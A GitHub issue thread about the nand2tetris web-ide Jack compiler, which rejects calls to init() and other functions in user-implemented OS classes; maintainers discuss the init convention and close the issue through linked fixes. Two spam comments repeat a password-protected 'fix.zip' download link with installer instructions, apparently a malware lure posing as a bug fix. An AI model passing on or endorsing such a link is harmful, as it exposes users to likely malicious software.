nand2tetris/web-ide #438: [bug]: Compiler relying on built-in OS

axelkern, 2024-08-26:
### Tool

Jack Compiler

### Interface

Website (https://nand2tetris.github.io/web-ide)

### What happened?

1. Compiler reports an error when trying to call the init() functions of OS classes.
Example: Sys.jack
class Sys {
  function void init() {
    do Memory.init();
    return;
  }
}
Error message: Class Memory doesn't contain a subroutine init

2. Compiler ignores API of own implementations of OS classes.
Example: Sys.jack
class Sys {
  function void init() {
    do Sys.test();
    return;
  }
  function void test() {
    return;
  }
}

Error: Class Sys doesn't contain a subroutine test

3. Consequently the same error message also occurs when trying to call Sys.test from another class.
4. The above tests are working when using non-OS class names

It seems to be, that OS classes get a special treatment relying on built-in structures. First of all, the internally defined API doesn't seem to be complete (i.e. init() missing). More importantly I would say this behavior is problematic and is taking away implementation flexibility from users. Ultimately it results in not compiling correct code.

I presume, that the idea was to ensure that OS classes are in line with the API specs, however the restrictions go far beyond this. It would be enough to prevent attempts to (re-)define reserved OS functions not in line with the API, i.e. trying to define a function Math.divide (int a, int b, int c);

### Do you want to try to fix this bug?

- [ ] I want to try to add this feature!

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

HaxBaba123, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

MoonShadowIllusion, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

axelkern, 2024-08-26:
On the other hand, this is actually accepted by the compiler:
<code>
class Math {
  function void sqrt(){
  return;
  }
  function void test(){
  do Math.sqrt(5);
// do Math.sqrt(); // compiler error...
  return;
  }
}
</code>

netalondon, 2024-09-10:
Hi @axelkern, thanks for reporting this.

Regarding your first point, here is @Shimon-Schocken's comment:
>  init is not part of the API, intentionally. Users / Jack programmers should not call it. Since Jack has no private functions, the only way to "protect" a function is not to list it in the API.

Of course, after we fix the other issues you raised, you could call the init method if you've implemented it.

Everything else is being fixed in the linked PR.

axelkern, 2024-09-10:
> Regarding your first point, here is @Shimon-Schocken's comment:
> 
> > init is not part of the API, intentionally. Users / Jack programmers should not call it. Since Jack has no private functions, the only way to "protect" a function is not to list it in the API.

init is not part of the API anymore, but it used to be well defined in the first edition of the book. In order to keep backwards compatibility, it should still be possible to call init(). In the second edition init is still explicitly mentioned as a convention, just with the caveat that it is not "documented in the OS API". Since some algorithms rely on initialized data structures (at least to implement them efficiently) and static variables are not initialized automatically, I think that the init convention is an essential part of the OS API. Anyway, I understand that the fix covers this issue. Thanks for fixing it.

Shimon-Schocken, 2024-09-10:
Neta hi:

He is right.  Our OS must conform to the proposed implementation
described in the course and in the book (lecture 12 / chapter 12).

Please modify your OS implementation. Add init functions in some of
the classes (as described in 12), and have them do the init work and
static data structures described in 12.

Thx -- Shimon

axelkern, 2024-09-14:
I think the challenge here is that the semantics for the init routines is only defined for the Sys.init routine, which has to call the init functions of the other static OS classes and call Main.main. For the other OS classes, the convention only guarantees that their init routine will be called at startup prior to any OS call of that respective class, but obviously there is no semantic definition what exactly happens inside these init functions since that is implementation specific.

This becomes especially relevant when developing and testing OS classes isolated. So there should be a mechanism that ensures that init will be called in Memory, Math, Output, Screen, Keyboard, even if Sys.jack / Sys.vm is not present. In other words, I think the functionality of Sys.init always has to be emulated if no Sys class is provided by the user.

Does that make sense?

netalondon, 2024-09-16:
We still need to add init implementations.
Forgot to prevent #449 from closing this.

netalondon, 2024-09-16:
>  I think the functionality of Sys.init always has to be emulated if no Sys class is provided by the user.

Can confirm that this is the behavior of the desktop version.

Fixing in #416

PR #449 (2024-09-16): Fix issues with overriding OS classes
Fixes #438
PR #461 (2024-09-16): Add init functions to OS and call them in Sys.init
This adds no-op init functions into the VM Emulator. These initializations are already performed by the simulator builtins in the TypeScript implementation. This exposes them for correctness when Jack compilers emit them as part of the sys.jack and OS bootstrap. 

Closes #438
closed 2024-09-16 by DavidSouther